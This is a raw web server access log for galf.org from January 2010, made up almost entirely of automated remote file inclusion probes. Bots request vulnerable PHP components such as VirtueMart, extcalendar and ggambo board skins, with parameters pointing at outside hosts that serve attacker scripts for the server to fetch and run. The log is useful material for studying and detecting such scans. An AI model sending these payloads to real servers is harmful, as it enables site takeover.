189.72.28.14 - - [17/Jan/2010:21:02:35 -0800] "GET /logs/access_091130.log//tools/send_reminders.php?noSet=0&includedir=http://scaner.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:21:02:35 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://scaner.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:21:02:35 -0800] "GET /logs/access_091109.log//tools/send_reminders.php?noSet=0&includedir=http://scaner.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:21:03:14 -0800] "GET /logs////bbs//skin/ggambo7002_board/write.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.149.85.32 - - [17/Jan/2010:21:03:14 -0800] "GET ///bbs//skin/ggambo7002_board/write.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.149.85.32 - - [17/Jan/2010:21:03:14 -0800] "GET /logs/access.log%20%20////bbs//skin/ggambo7002_board/write.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.149.85.32 - - [17/Jan/2010:21:03:15 -0800] "GET ///bbs//skin/ggambo7002_board/write.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.149.85.32 - - [17/Jan/2010:21:03:15 -0800] "GET /logs/access.log%20%20////bbs//skin/ggambo7002_board/write.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.149.85.32 - - [17/Jan/2010:21:03:15 -0800] "GET /logs////bbs//skin/ggambo7002_board/write.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
199.236.85.228 - - [17/Jan/2010:21:03:42 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://cosmeticawards.com/submit/file/mini.htm??? HTTP/1.0" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
199.236.85.228 - - [17/Jan/2010:21:03:43 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://cosmeticawards.com/submit/file/mini.htm??? HTTP/1.0" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:21:04:23 -0800] "GET /logs////bbs//skin/ggambo7002_board/write.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:21:04:23 -0800] "GET ///bbs//skin/ggambo7002_board/write.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:21:04:23 -0800] "GET /logs/access_100111.log%20%20////bbs//skin/ggambo7002_board/write.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:21:04:25 -0800] "GET ///bbs//skin/ggambo7002_board/write.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:21:04:25 -0800] "GET /logs////bbs//skin/ggambo7002_board/write.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:21:04:25 -0800] "GET /logs/access_100111.log%20%20////bbs//skin/ggambo7002_board/write.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:21:04:27 -0800] "GET /logs/access.log%20%20////bbs//skin/ggambo7002_board/write.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.149.85.32 - - [17/Jan/2010:21:04:27 -0800] "GET ///bbs//skin/ggambo7002_board/write.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.149.85.32 - - [17/Jan/2010:21:04:27 -0800] "GET /logs////bbs//skin/ggambo7002_board/write.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.72.28.14 - - [17/Jan/2010:21:04:42 -0800] "GET /logs///////////////////?_SERVER[DOCUMENT_ROOT]=http://www.hfsb.org/sites/10225/img/.patch/id1.txt? HTTP/1.1" 200 4821 "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:21:04:43 -0800] "GET //////////////////?_SERVER[DOCUMENT_ROOT]=http://www.hfsb.org/sites/10225/img/.patch/id1.txt? HTTP/1.1" 200 1064 "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:21:04:43 -0800] "GET /logs/access_090928.log///////////////////?_SERVER[DOCUMENT_ROOT]=http://www.hfsb.org/sites/10225/img/.patch/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.164 - - [17/Jan/2010:21:05:34 -0800] "GET /logs/access_090824.log////?path=http://www.noin9191.com/ams/ammember/rfi1.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:21:05:39 -0800] "GET /logs/access_100111.log%20%20////bbs//skin/ggambo7002_board/write.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:21:05:39 -0800] "GET /logs////bbs//skin/ggambo7002_board/write.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:21:05:39 -0800] "GET ///bbs//skin/ggambo7002_board/write.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [17/Jan/2010:21:05:59 -0800] "GET /logs//wbblog/index.php?_SERVER[DOCUMENT_ROOT]=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [17/Jan/2010:21:05:59 -0800] "GET /wbblog/index.php?_SERVER[DOCUMENT_ROOT]=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [17/Jan/2010:21:05:59 -0800] "GET /logs/access_091221.log//wbblog/index.php?_SERVER[DOCUMENT_ROOT]=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [17/Jan/2010:21:06:03 -0800] "GET /logs/access_091221.log%20%20//wbblog/index.php?_SERVER[DOCUMENT_ROOT]=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [17/Jan/2010:21:06:03 -0800] "GET /wbblog/index.php?_SERVER[DOCUMENT_ROOT]=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [17/Jan/2010:21:06:03 -0800] "GET /logs//wbblog/index.php?_SERVER[DOCUMENT_ROOT]=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.236.85.228 - - [17/Jan/2010:21:06:30 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://cosmeticawards.com/submit/file/mini.htm??? HTTP/1.0" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "galf.org"
199.236.85.228 - - [17/Jan/2010:21:06:30 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://cosmeticawards.com/submit/file/mini.htm??? HTTP/1.0" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "galf.org"
77.79.246.80 - - [17/Jan/2010:21:06:48 -0800] "GET /logs/access_090928.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [17/Jan/2010:21:06:52 -0800] "GET /logs/access_091012.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [17/Jan/2010:21:06:55 -0800] "GET /logs/access_091221.log//wbblog/index.php?_SERVER[DOCUMENT_ROOT]=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [17/Jan/2010:21:06:55 -0800] "GET /wbblog/index.php?_SERVER[DOCUMENT_ROOT]=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [17/Jan/2010:21:06:55 -0800] "GET /logs//wbblog/index.php?_SERVER[DOCUMENT_ROOT]=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [17/Jan/2010:21:06:56 -0800] "GET /logs//wbblog/index.php?_SERVER[DOCUMENT_ROOT]=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [17/Jan/2010:21:06:56 -0800] "GET /wbblog/index.php?_SERVER[DOCUMENT_ROOT]=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [17/Jan/2010:21:06:56 -0800] "GET /logs/access_091221.log//wbblog/index.php?_SERVER[DOCUMENT_ROOT]=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:21:07:35 -0800] "GET /logs/access_100111.log%20%20///////////////////?_SERVER[DOCUMENT_ROOT]=http://www.hfsb.org/sites/10225/img/.patch/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:07:44 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:07:44 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:07:44 -0800] "GET /logs/access_091012.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:07:49 -0800] "GET /logs/access_091026.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:08:36 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://acolmi.org/images/save.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:08:37 -0800] "GET /logs/access_091026.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://acolmi.org/images/save.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:08:37 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://acolmi.org/images/save.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:08:37 -0800] "GET /logs/access_091012.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://acolmi.org/images/save.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.59.90 - - [17/Jan/2010:21:08:45 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.175.59.90 - - [17/Jan/2010:21:08:45 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.175.59.90 - - [17/Jan/2010:21:08:45 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.17.199.105 - - [17/Jan/2010:21:08:45 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.17.199.105 - - [17/Jan/2010:21:08:45 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.17.199.105 - - [17/Jan/2010:21:08:45 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.235.54.152 - - [17/Jan/2010:21:08:55 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:08:56 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:08:56 -0800] "GET /logs/access_091012.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:08:57 -0800] "GET /logs/access_091026.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:21:08:58 -0800] "GET ///skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:21:08:58 -0800] "GET /logs////skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:08:59 -0800] "GET /logs/access_091012.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:09:00 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:09:00 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:09:00 -0800] "GET /logs/access_091026.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.59.90 - - [17/Jan/2010:21:09:08 -0800] "GET /logs/access_090928.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:21:09:08 -0800] "GET /logs/access_090803.log%20%20////skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:21:09:11 -0800] "GET ///skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:21:09:11 -0800] "GET /logs////skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.59.90 - - [17/Jan/2010:21:09:12 -0800] "GET /logs/access_091012.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:21:09:18 -0800] "GET /logs/access_090803.log%20%20////skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:21:09:52 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:21:09:52 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:21:09:52 -0800] "GET /logs/access_091116.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:21:09:52 -0800] "GET /logs/access_090824.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [17/Jan/2010:21:10:09 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.172.33.230 - - [17/Jan/2010:21:10:13 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.172.33.230 - - [17/Jan/2010:21:10:13 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.1.16.10 - - [17/Jan/2010:21:10:35 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://scaner.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.1.16.10 - - [17/Jan/2010:21:10:35 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://scaner.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.1.16.10 - - [17/Jan/2010:21:10:35 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://scaner.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.17.199.105 - - [17/Jan/2010:21:11:02 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.17.199.105 - - [17/Jan/2010:21:11:02 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.17.199.105 - - [17/Jan/2010:21:11:02 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.17.199.105 - - [17/Jan/2010:21:13:09 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.17.199.105 - - [17/Jan/2010:21:13:09 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.17.199.105 - - [17/Jan/2010:21:13:09 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.17.199.105 - - [17/Jan/2010:21:13:30 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.17.199.105 - - [17/Jan/2010:21:13:31 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.17.199.105 - - [17/Jan/2010:21:13:31 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.17.199.105 - - [17/Jan/2010:21:13:31 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.17.199.105 - - [17/Jan/2010:21:13:31 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.17.199.105 - - [17/Jan/2010:21:13:32 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.17.199.105 - - [17/Jan/2010:21:13:53 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.17.199.105 - - [17/Jan/2010:21:13:53 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.17.199.105 - - [17/Jan/2010:21:13:53 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.192.120.211 - - [17/Jan/2010:21:16:28 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.192.120.211 - - [17/Jan/2010:21:16:28 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.192.120.211 - - [17/Jan/2010:21:16:28 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.192.120.211 - - [17/Jan/2010:21:17:35 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.192.120.211 - - [17/Jan/2010:21:17:35 -0800] "GET /logs/access_100111.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.192.120.211 - - [17/Jan/2010:21:17:35 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [17/Jan/2010:21:18:29 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.79.246.80 - - [17/Jan/2010:21:18:29 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.79.246.80 - - [17/Jan/2010:21:18:29 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.234.63.107 - - [17/Jan/2010:21:19:19 -0800] "GET /logs/access_091214.log%20%20//skin/happycast_board/view.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.234.63.107 - - [17/Jan/2010:21:19:19 -0800] "GET /logs//skin/happycast_board/view.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.234.63.107 - - [17/Jan/2010:21:19:19 -0800] "GET /skin/happycast_board/view.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [17/Jan/2010:21:20:27 -0800] "GET /cendoc/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
89.234.63.107 - - [17/Jan/2010:21:21:07 -0800] "GET /skin/happycast_board/view.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.234.63.107 - - [17/Jan/2010:21:21:07 -0800] "GET /logs//skin/happycast_board/view.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
